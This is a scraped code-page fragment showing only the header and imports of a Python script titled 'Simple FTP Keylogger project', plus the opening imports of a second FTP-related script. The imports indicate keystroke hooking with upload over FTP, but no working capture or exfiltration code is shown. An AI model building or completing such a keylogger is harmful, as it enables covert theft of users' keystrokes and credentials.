This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
""" | |
Simple FTP Keylogger project v1.0 by Alex Avlonitis www.techfromhell.blogspot.com | |
inspired by https://github.com/ajinabraham/Xenotix-Python-Keylogger | |
""" | |
from ftplib import FTP | |
import win32api | |
import sys | |
import pythoncom, pyHook | |
import os | |
import datetime, time |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
import sys | |
import os | |
import ftplib | |
import socket | |
import getpass | |
try: | |
input = raw_input |